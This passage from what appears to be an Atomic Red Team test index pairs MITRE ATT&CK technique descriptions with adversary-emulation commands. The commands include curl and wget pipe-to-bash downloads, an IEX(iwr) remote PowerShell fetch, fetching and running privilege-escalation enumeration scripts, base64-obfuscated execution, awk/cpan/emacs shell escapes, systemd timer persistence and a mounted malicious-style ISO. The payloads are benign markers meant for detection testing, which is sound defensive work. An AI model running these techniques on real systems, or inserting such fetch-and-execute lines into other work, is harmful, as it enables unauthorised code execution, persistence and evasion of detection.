elevation_required: false
command: 'systemd-run --user --unit=Atomic-Red-Team --on-calendar ''*:0/1''
/bin/sh -c ''echo "$(date) $(whoami)" >>/tmp/log''
'
cleanup_command: |
systemctl --user stop Atomic-Red-Team.service
systemctl --user stop Atomic-Red-Team.timer
rm /tmp/log
name: sh
- name: Create a system level transient systemd service and timer
auto_generated_guid: d3eda496-1fc0-49e9-aff5-3bec5da9fa22
description: "Schedule a system level transient task (will not survive a reboot)
without having to create the .timer or .service files by using the systemd-run
command. \n"
supported_platforms:
- linux
dependency_executor_name: sh
dependencies:
- description: 'Check if systemd-run exists on the machine
'
prereq_command: 'if [ -x "$(command -v systemd-run)" ]; then exit 0; else
exit 1; fi;
'
get_prereq_command: 'echo "Install systemd on the machine."; exit 1;
'
executor:
elevation_required: true
command: 'systemd-run --unit=Atomic-Red-Team --on-calendar ''*:0/1'' /bin/sh
-c ''echo "$(date) $(whoami)" >>/tmp/log''
'
cleanup_command: |
systemctl stop Atomic-Red-Team.service
systemctl stop Atomic-Red-Team.timer
rm /tmp/log
name: sh
T1059.004:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--a9d4b653-6915-42af-98b2-5758c4ceee56
created: '2020-03-09T14:15:05.330Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1059/004
external_id: T1059.004
- source_name: Apple ZShell
description: Apple. (2020, January 28). Use zsh as the default shell on your
Mac. Retrieved June 12, 2020.
url: https://support.apple.com/HT208050
- source_name: DieNet Bash
description: die.net. (n.d.). bash(1) - Linux man page. Retrieved June 12,
2020.
url: https://linux.die.net/man/1/bash
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:12.476Z'
name: 'Command and Scripting Interpreter: Bash'
description: |-
Adversaries may abuse Unix shell commands and scripts for execution. Unix shells are the primary command prompt on Linux, macOS, and ESXi systems, though many variations of the Unix shell exist (e.g. sh, ash, bash, zsh, etc.) depending on the specific OS or distribution.(Citation: DieNet Bash)(Citation: Apple ZShell) Unix shells can control every aspect of a system, with certain commands requiring elevated privileges.
Unix shells also support scripts that enable sequential execution of commands as well as other typical programming operations such as conditionals and loops. Common uses of shell scripts include long or repetitive tasks, or the need to run the same set of commands on multiple systems.
Adversaries may abuse Unix shells to execute various commands or payloads. Interactive shells may be accessed through command and control channels or during lateral movement such as with [SSH](https://attack.mitre.org/techniques/T1021/004). Adversaries may also leverage shell scripts to deliver and execute multiple commands on victims or as part of payloads used for persistence.
Some systems, such as embedded devices, lightweight Linux distributions, and ESXi servers, may leverage stripped-down Unix shells via Busybox, a small executable that contains a variety of tools, including a simple shell.
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- ESXi
- Linux
- macOS
- Network Devices
x_mitre_version: '1.4'
x_mitre_remote_support: false
identifier: T1059.004
atomic_tests:
- name: Create and Execute Bash Shell Script
auto_generated_guid: 7e7ac3ed-f795-4fa5-b711-09d6fbe9b873
description: 'Creates and executes a simple sh script.
'
supported_platforms:
- linux
- macos
input_arguments:
script_path:
description: Script path
type: path
default: "/tmp/art.sh"
host:
description: Host to ping
type: string
default: 8.8.8.8
executor:
command: |
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
cleanup_command: 'rm #{script_path}
'
name: sh
- name: Command-Line Interface
auto_generated_guid: d0c88567-803d-4dca-99b4-7ce65e7b257c
description: |
Using Curl to download and pipe a payload to Bash. NOTE: Curl-ing to Bash is generally a bad idea if you don't control the server.
Upon successful execution, sh will download via curl and wget the specified payload (echo-art-fish.sh) and set a marker file in `/tmp/art-fish.txt`.
supported_platforms:
- linux
- macos
executor:
command: |
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
cleanup_command: 'rm /tmp/art-fish.txt
'
name: sh
- name: Harvest SUID executable files
auto_generated_guid: 46274fc6-08a7-4956-861b-24cbbaa0503c
description: "AutoSUID application is the Open-Source project, the main idea
of which is to automate harvesting the SUID executable files and to find a
way for further escalating the privileges. \n"
supported_platforms:
- linux
input_arguments:
autosuid:
description: Path to the autosuid shell script
type: path
default: PathToAtomicsFolder/T1059.004/src/AutoSUID.sh
autosuid_url:
description: Path to download autosuid shell script
type: url
default: https://raw.githubusercontent.com/IvanGlinkin/AutoSUID/main/AutoSUID.sh
dependency_executor_name: bash
dependencies:
- description: 'AutoSUID must exist on disk at specified location (#{autosuid})
'
prereq_command: 'if [ -f #{autosuid} ]; then exit 0; else exit 1; fi;
'
get_prereq_command: 'curl --create-dirs #{autosuid_url} --output #{autosuid}
'
executor:
command: |
chmod +x #{autosuid}
bash #{autosuid}
cleanup_command: 'rm -rf #{autosuid}
'
name: sh
- name: LinEnum tool execution
auto_generated_guid: a2b35a63-9df1-4806-9a4d-5fe0500845f2
description: 'LinEnum is a bash script that performs discovery commands for
accounts,processes, kernel version, applications, services, and uses the information
from these commands to present operator with ways of escalating privileges
or further exploitation of targeted host.
'
supported_platforms:
- linux
input_arguments:
linenum:
description: Path to the LinEnum shell script
type: path
default: PathToAtomicsFolder/T1059.004/src/LinEnum.sh
linenum_url:
description: Path to download LinEnum shell script
type: url
default: https://raw.githubusercontent.com/rebootuser/LinEnum/c47f9b226d3ce2848629f25fe142c1b2986bc427/LinEnum.sh
dependency_executor_name: bash
dependencies:
- description: 'LinnEnum must exist on disk at specified location (#{linenum})
'
prereq_command: 'if [ -f #{linenum} ]; then exit 0; else exit 1; fi;
'
get_prereq_command: 'curl --create-dirs #{linenum_url} --output #{linenum}
'
executor:
command: |
chmod +x #{linenum}
bash #{linenum}
cleanup_command: 'rm -rf #{linenum}
'
name: sh
- name: New script file in the tmp directory
auto_generated_guid: 8cd1947b-4a54-41fb-b5ea-07d0ace04f81
description: 'An attacker may create script files in the /tmp directory using
the mktemp utility and execute them. The following commands creates a temp
file and places a pointer to it in the variable $TMPFILE, echos the string
id into it, and then executes the file using bash, which results in the id
command being executed.
'
supported_platforms:
- linux
executor:
name: sh
elevation_required: false
command: |
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
cleanup_command: |
rm $TMPFILE
unset TMPFILE
- name: What shell is running
auto_generated_guid: 7b38e5cc-47be-44f0-a425-390305c76c17
description: 'An adversary will want to discover what shell is running so that
they can tailor their attacks accordingly. The following commands will discover
what shell is running.
'
supported_platforms:
- linux
executor:
name: sh
elevation_required: false
command: |
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
- name: What shells are available
auto_generated_guid: bf23c7dc-1004-4949-8262-4c1d1ef87702
description: 'An adversary may want to discover which shell''s are available
so that they might switch to that shell to tailor their attacks to suit that
shell. The following commands will discover what shells are available on the
host.
'
supported_platforms:
- linux
executor:
name: sh
elevation_required: false
command: "cat /etc/shells \n"
- name: Command line scripts
auto_generated_guid: b04ed73c-7d43-4dc8-b563-a2fc595cba1a
description: 'An adversary may type in elaborate multi-line shell commands into
a terminal session because they can''t or don''t wish to create script files
on the host. The following command is a simple loop, echoing out Atomic Red
Team was here!
'
supported_platforms:
- linux
executor:
name: sh
command: 'for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep
1; done
'
- name: Obfuscated command line scripts
auto_generated_guid: 5bec4cc8-f41e-437b-b417-33ff60acf9af
description: 'An adversary may pre-compute the base64 representations of the
terminal commands that they wish to execute in an attempt to avoid or frustrate
detection. The following commands base64 encodes the text string id, then
base64 decodes the string, then pipes it as a command to bash, which results
in the id command being executed.
'
supported_platforms:
- linux
executor:
name: sh
elevation_required: false
command: |
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
- name: Change login shell
auto_generated_guid: c7ac59cb-13cc-4622-81dc-6d2fee9bfac7
description: "An adversary may want to use a different login shell. The chsh
command changes the user login shell. The following test, creates an art user
with a /bin/bash shell, changes the users shell to sh, then deletes the art
user. \n"
supported_platforms:
- linux
dependencies:
- description: 'chsh - change login shell, must be installed
'
prereq_command: 'if [ -f /usr/bin/chsh ]; then echo "exit 0"; else echo "exit
1"; exit 1; fi
'
get_prereq_command: 'echo "Automated installer not implemented yet, please
install chsh manually"
'
executor:
name: bash
elevation_required: true
command: |
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
cleanup_command: '[ "$(uname)" = ''FreeBSD'' ] && rmuser -y art || userdel
art
'
- name: Environment variable scripts
auto_generated_guid: bdaebd56-368b-4970-a523-f905ff4a8a51
description: 'An adversary may place scripts in an environment variable because
they can''t or don''t wish to create script files on the host. The following
test, in a bash shell, exports the ART variable containing an echo command,
then pipes the variable to /bin/bash
'
supported_platforms:
- linux
executor:
name: sh
elevation_required: false
command: |
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
cleanup_command: 'unset ART
'
- name: Detecting pipe-to-shell
auto_generated_guid: fca246a8-a585-4f28-a2df-6495973976a1
description: 'An adversary may develop a useful utility or subvert the CI/CD
pipe line of a legitimate utility developer, who requires or suggests installing
their utility by piping a curl download directly into bash. Of-course this
is a very bad idea. The adversary may also take advantage of this BLIND install
method and selectively running extra commands in the install script for those
who DO pipe to bash and not for those who DO NOT. This test uses curl to download
the pipe-to-shell.sh script, the first time without piping it to bash and
the second piping it into bash which executes the echo command.
'
supported_platforms:
- linux
input_arguments:
remote_url:
description: url of remote payload
type: url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/pipe-to-shell.sh
dependency_executor_name: bash
dependencies:
- description: 'Check if curl is installed on the machine.
'
prereq_command: 'if [ -x "$(command -v curl)" ]; then echo "curl is installed";
else echo "curl is NOT installed"; exit 1; fi
'
get_prereq_command: 'which apt && apt update && apt install -y curl || which
pkg && pkg update && pkg install -y curl
'
executor:
name: sh
elevation_required: false
command: "cd /tmp\ncurl -s #{remote_url} |bash\nls -la /tmp/art.txt \n"
cleanup_command: 'rm /tmp/art.txt
'
- name: Current kernel information enumeration
auto_generated_guid: 3a53734a-9e26-4f4b-ad15-059e767f5f14
description: 'An adversary may want to enumerate the kernel information to tailor
their attacks for that particular kernel. The following command will enumerate
the kernel information.
'
supported_platforms:
- linux
executor:
name: sh
elevation_required: false
command: 'uname -srm
'
- name: Shell Creation using awk command
auto_generated_guid: ee72b37d-b8f5-46a5-a9e7-0ff50035ffd5
description: |-
In awk the begin rule runs the first record without reading or interpreting it. This way a shell can be created and used to break out from restricted environments with the awk command.
Reference - https://gtfobins.github.io/gtfobins/awk/#shell
supported_platforms:
- linux
- macos
executor:
command: awk 'BEGIN {system("/bin/sh &")}'
name: sh
- name: Creating shell using cpan command
auto_generated_guid: bcd4c2bc-490b-4f91-bd31-3709fe75bbdf
description: |-
cpan lets you execute perl commands with the ! command. It can be used to break out from restricted environments by spawning an interactive system shell.
Reference - https://gtfobins.github.io/gtfobins/cpan/
supported_platforms:
- linux
- macos
executor:
command: echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
name: sh
elevation_required: false
- name: Shell Creation using busybox command
auto_generated_guid: ab4d04af-68dc-4fee-9c16-6545265b3276
description: "BusyBox is a multi-call binary. A multi-call binary is an executable
program that performs the same job as more than one utility program. It can
be used to break out from restricted environments by spawning an interactive
system shell. \nReference - https://gtfobins.github.io/gtfobins/busybox/"
supported_platforms:
- linux
executor:
command: busybox sh &
cleanup_command:
name: sh
elevation_required: false
- name: emacs spawning an interactive system shell
auto_generated_guid: e0742e38-6efe-4dd4-ba5c-2078095b6156
description: "emacs can be used to break out from restricted environments by
spawning an interactive system shell. Ref: https://gtfobins.github.io/gtfobins/emacs/
\ \n"
supported_platforms:
- linux
- macos
dependency_executor_name: bash
dependencies:
- description: 'Check if emacs is installed on the machine.
'
prereq_command: 'if [ -x "$(command -v emacs)" ]; then echo "emacs is installed";
else echo "emacs is NOT installed"; exit 1; fi
'
get_prereq_command: 'which apt && apt update && apt install -y emacs || which
pkg && pkg update && pkg install -y emacs || which brew && brew update &&
brew install --quiet emacs
'
executor:
command: sudo emacs -Q -nw --eval '(term "/bin/sh &")'
name: sh
elevation_required: true
T1559:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--acd0ba37-7ba9-4cc5-ac61-796586cd856d
created: '2020-02-12T14:08:48.689Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1559
external_id: T1559
- source_name: Fireeye Hunting COM June 2019
description: Hamilton, C. (2019, June 4). Hunting COM Objects. Retrieved June
10, 2019.
url: https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects.html
- source_name: Linux IPC
description: N/A. (2021, April 1). Inter Process Communication (IPC). Retrieved
March 11, 2022.
url: https://www.geeksforgeeks.org/inter-process-communication-ipc/#:~:text=Inter%2Dprocess%20communication%20(IPC),of%20co%2Doperation%20between%20them.
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:13.194Z'
name: Inter-Process Communication
description: "Adversaries may abuse inter-process communication (IPC) mechanisms
for local code or command execution. IPC is typically used by processes to
share data, communicate with each other, or synchronize execution. IPC is
also commonly used to avoid situations such as deadlocks, which occurs when
processes are stuck in a cyclic waiting pattern. \n\nAdversaries may abuse
IPC to execute arbitrary code or commands. IPC mechanisms may differ depending
on OS, but typically exists in a form accessible through programming languages/libraries
or native interfaces such as Windows [Dynamic Data Exchange](https://attack.mitre.org/techniques/T1559/002)
or [Component Object Model](https://attack.mitre.org/techniques/T1559/001).
Linux environments support several different IPC mechanisms, two of which
being sockets and pipes.(Citation: Linux IPC) Higher level execution mediums,
such as those of [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)s,
may also leverage underlying IPC mechanisms. Adversaries may also use [Remote
Services](https://attack.mitre.org/techniques/T1021) such as [Distributed
Component Object Model](https://attack.mitre.org/techniques/T1021/003) to
facilitate remote IPC execution.(Citation: Fireeye Hunting COM June 2019)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
- Windows
x_mitre_version: '1.4'
x_mitre_remote_support: false
identifier: T1559
atomic_tests:
- name: Cobalt Strike Artifact Kit pipe
auto_generated_guid: bd13b9fc-b758-496a-b81a-397462f82c72
description: |
Uses the [Named Pipes Micro Emulation](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/tree/master/micro_emulation_plans/src/named_pipes) executable from the Center for Threat Informed Defense to create a named pipe for inter-process communication.
The named pipe executable will pause for 30 seconds to allow the client and server to exchange a message through the pipe.
supported_platforms:
- windows
dependency_executor_name: powershell
dependencies:
- description: 'Named pipe executors must exist on disk
'
prereq_command: 'if ((Test-Path "PathToAtomicsFolder\..\ExternalPayloads\build\namedpipes_executor.exe")
-and (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\build\namedpipes_client.exe")
-and (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\build\namedpipes_server.exe"))
{exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing)
$zipUrl = "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/raw/master/micro_emulation_plans/src/named_pipes/named_pipes.zip"
Invoke-FetchFromZip $zipUrl "*.exe" "PathToAtomicsFolder\..\ExternalPayloads"
executor:
command: '"PathToAtomicsFolder\..\ExternalPayloads\build\namedpipes_executor.exe"
--pipe 1
'
name: command_prompt
- name: Cobalt Strike Lateral Movement (psexec_psh) pipe
auto_generated_guid: 830c8b6c-7a70-4f40-b975-8bbe74558acd
description: |
Uses the [Named Pipes Micro Emulation](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/tree/master/micro_emulation_plans/src/named_pipes) executable from the Center for Threat Informed Defense to create a named pipe for inter-process communication.
The named pipe executable will pause for 30 seconds to allow the client and server to exchange a message through the pipe.
supported_platforms:
- windows
dependency_executor_name: powershell
dependencies:
- description: 'Named pipe executors must exist on disk
'
prereq_command: 'if ((Test-Path "PathToAtomicsFolder\..\ExternalPayloads\build\namedpipes_executor.exe")
-and (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\build\namedpipes_client.exe")
-and (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\build\namedpipes_server.exe"))
{exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing)
$zipUrl = "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/raw/master/micro_emulation_plans/src/named_pipes/named_pipes.zip"
Invoke-FetchFromZip $zipUrl "*.exe" "PathToAtomicsFolder\..\ExternalPayloads"
executor:
command: '"PathToAtomicsFolder\..\ExternalPayloads\build\namedpipes_executor.exe"
--pipe 2
'
name: command_prompt
- name: Cobalt Strike SSH (postex_ssh) pipe
auto_generated_guid: d1f72fa0-5bc2-4b4b-bd1e-43b6e8cfb2e6
description: |
Uses the [Named Pipes Micro Emulation](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/tree/master/micro_emulation_plans/src/named_pipes) executable from the Center for Threat Informed Defense to create a named pipe for inter-process communication.
The named pipe executable will pause for 30 seconds to allow the client and server to exchange a message through the pipe.
supported_platforms:
- windows
dependency_executor_name: powershell
dependencies:
- description: 'Named pipe executors must exist on disk
'
prereq_command: 'if ((Test-Path "PathToAtomicsFolder\..\ExternalPayloads\build\namedpipes_executor.exe")
-and (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\build\namedpipes_client.exe")
-and (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\build\namedpipes_server.exe"))
{exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing)
$zipUrl = "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/raw/master/micro_emulation_plans/src/named_pipes/named_pipes.zip"
Invoke-FetchFromZip $zipUrl "*.exe" "PathToAtomicsFolder\..\ExternalPayloads"
executor:
command: '"PathToAtomicsFolder\..\ExternalPayloads\build\namedpipes_executor.exe"
--pipe 3
'
name: command_prompt
- name: Cobalt Strike post-exploitation pipe (4.2 and later)
auto_generated_guid: 7a48f482-246f-4aeb-9837-21c271ebf244
description: |
Uses the [Named Pipes Micro Emulation](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/tree/master/micro_emulation_plans/src/named_pipes) executable from the Center for Threat Informed Defense to create a named pipe for inter-process communication.
The named pipe executable will pause for 30 seconds to allow the client and server to exchange a message through the pipe.
supported_platforms:
- windows
dependency_executor_name: powershell
dependencies:
- description: 'Named pipe executors must exist on disk
'
prereq_command: 'if ((Test-Path "PathToAtomicsFolder\..\ExternalPayloads\build\namedpipes_executor.exe")
-and (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\build\namedpipes_client.exe")
-and (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\build\namedpipes_server.exe"))
{exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing)
$zipUrl = "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/raw/master/micro_emulation_plans/src/named_pipes/named_pipes.zip"
Invoke-FetchFromZip $zipUrl "*.exe" "PathToAtomicsFolder\..\ExternalPayloads"
executor:
command: '"PathToAtomicsFolder\..\ExternalPayloads\build\namedpipes_executor.exe"
--pipe 4
'
name: command_prompt
- name: Cobalt Strike post-exploitation pipe (before 4.2)
auto_generated_guid: 8dbfc15c-527b-4ab0-a272-019f469d367f
description: |
Uses the [Named Pipes Micro Emulation](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/tree/master/micro_emulation_plans/src/named_pipes) executable from the Center for Threat Informed Defense to create a named pipe for inter-process communication.
The named pipe executable will pause for 30 seconds to allow the client and server to exchange a message through the pipe.
supported_platforms:
- windows
dependency_executor_name: powershell
dependencies:
- description: 'Named pipe executors must exist on disk
'
prereq_command: 'if ((Test-Path "PathToAtomicsFolder\..\ExternalPayloads\build\namedpipes_executor.exe")
-and (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\build\namedpipes_client.exe")
-and ("Test-Path PathToAtomicsFolder\..\ExternalPayloads\build\namedpipes_server.exe"))
{exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing)
$zipUrl = "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/raw/master/micro_emulation_plans/src/named_pipes/named_pipes.zip"
Invoke-FetchFromZip $zipUrl "*.exe" "PathToAtomicsFolder\..\ExternalPayloads"
executor:
command: '"PathToAtomicsFolder\..\ExternalPayloads\build\namedpipes_executor.exe"
--pipe 5
'
name: command_prompt
T1059.011:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--afddee82-3385-4682-ad90-eeced33f2d07
created: '2024-08-05T18:19:42.201Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1059/011
external_id: T1059.011
- source_name: Kaspersky Lua
description: Global Research and Analysis Team. (2016, August 9). The ProjectSauron
APT. Retrieved August 5, 2024.
url: https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07190154/The-ProjectSauron-APT_research_KL.pdf
- source_name: Lua main page
description: Lua. (2024, June 25). Getting started. Retrieved August 5, 2024.
url: https://www.lua.org/start.html
- source_name: Lua state
description: Lua. (n.d.). lua_State. Retrieved August 5, 2024.
url: https://pgl.yoyo.org/luai/i/lua_State
- source_name: Cyphort EvilBunny
description: 'Marschalek, Marion. (2014, December 16). EvilBunny: Malware
Instrumented By Lua. Retrieved August 5, 2024.'
url: https://web.archive.org/web/20150311013500/http:/www.cyphort.com/evilbunny-malware-instrumented-lua/
- source_name: PoetRat Lua
description: 'Mercer, Warren. (2020, October 6). PoetRAT: Malware targeting
public and private sector in Azerbaijan evolves. Retrieved August 5, 2024.'
url: https://blog.talosintelligence.com/poetrat-update/
- source_name: Lua Proofpoint Sunseed
description: 'Raggi, Michael. Cass, Zydeca. The Proofpoint Threat Research
Team.. (2022, March 1). Asylum Ambuscade: State Actor Uses Lua-based Sunseed
Malware to Target European Governments and Refugee Movement. Retrieved August
5, 2024.'
url: https://www.proofpoint.com/us/blog/threat-insight/asylum-ambuscade-state-actor-uses-compromised-private-ukrainian-military-emails
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-04-15T19:58:57.854Z'
name: Lua
description: |-
Adversaries may abuse Lua commands and scripts for execution. Lua is a cross-platform scripting and programming language primarily designed for embedded use in applications. Lua can be executed on the command-line (through the stand-alone lua interpreter), via scripts (.lua), or from Lua-embedded programs (through the struct lua_State).(Citation: Lua main page)(Citation: Lua state)
Lua scripts may be executed by adversaries for malicious purposes. Adversaries may incorporate, abuse, or replace existing Lua interpreters to allow for malicious Lua command execution at runtime.(Citation: PoetRat Lua)(Citation: Lua Proofpoint Sunseed)(Citation: Cyphort EvilBunny)(Citation: Kaspersky Lua)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- Network Devices
- Windows
- macOS
x_mitre_version: '1.1'
x_mitre_remote_support: false
atomic_tests: []
T1204.003:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--b0c74ef9-c61e-4986-88cb-78da98a355ec
created: '2021-03-30T17:20:05.789Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1204/003
external_id: T1204.003
- source_name: Summit Route Malicious AMIs
description: Piper, S.. (2018, September 24). Investigating Malicious AMIs.
Retrieved March 30, 2021.
url: https://summitroute.com/blog/2018/09/24/investigating_malicious_amis/
- source_name: Aqua Security Cloud Native Threat Report June 2021
description: Team Nautilus. (2021, June). Attacks in the Wild on the Container
Supply Chain and Infrastructure. Retrieved August 26, 2021.
url: https://info.aquasec.com/hubfs/Threat%20reports/AquaSecurity_Cloud_Native_Threat_Report_2021.pdf?utm_campaign=WP%20-%20Jun2021%20Nautilus%202021%20Threat%20Research%20Report&utm_medium=email&_hsmi=132931006&_hsenc=p2ANqtz-_8oopT5Uhqab8B7kE0l3iFo1koirxtyfTehxF7N-EdGYrwk30gfiwp5SiNlW3G0TNKZxUcDkYOtwQ9S6nNVNyEO-Dgrw&utm_content=132931006&utm_source=hs_automation
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:13.999Z'
name: 'User Execution: Malicious Image'
description: |-
Adversaries may rely on a user running a malicious image to facilitate execution. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be backdoored. Backdoored images may be uploaded to a public repository via [Upload Malware](https://attack.mitre.org/techniques/T1608/001), and users may then download and deploy an instance or container from the image without realizing the image is malicious, thus bypassing techniques that specifically achieve Initial Access. This can lead to the execution of malicious code, such as code that executes cryptocurrency mining, in the instance or container.(Citation: Summit Route Malicious AMIs)
Adversaries may also name images a certain way to increase the chance of users mistakenly deploying an instance or container from the image (ex: [Match Legitimate Resource Name or Location](https://attack.mitre.org/techniques/T1036/005)).(Citation: Aqua Security Cloud Native Threat Report June 2021)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Center for Threat-Informed Defense (CTID)
- Vishwas Manral, McAfee
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- IaaS
- Containers
x_mitre_version: '1.2'
identifier: T1204.003
atomic_tests:
- name: Malicious Execution from Mounted ISO Image
auto_generated_guid: e9795c8d-42aa-4ed4-ad80-551ed793d006
description: Adversaries may rely on a user running a malicious image to facilitate
execution
supported_platforms:
- windows
executor:
command: |-
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.003/src/qbot-test.iso" -OutFile "$env:TEMP\qbot-test.iso")
Mount-DiskImage -ImagePath "$env:TEMP\qbot-test.iso"
$mountedpath = (Get-DiskImage -ImagePath "$env:TEMP\qbot-test.iso" | Get-Volume).DriveLetter
$finalpath = $mountedpath + ":\"
cd $finalpath
.\calc.exe.lnk
cleanup_command: "start-sleep -s 5\nstop-process -Name \"Calculatorapp\" -Force
\ndismount-diskimage -ImagePath \"$env:TEMP\\qbot-test.iso\""
name: powershell
elevation_required: true
T1203:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--be2dcee9-a7a7-4e38-afd6-21b31ecc3d63
created: '2018-04-18T17:59:24.739Z'
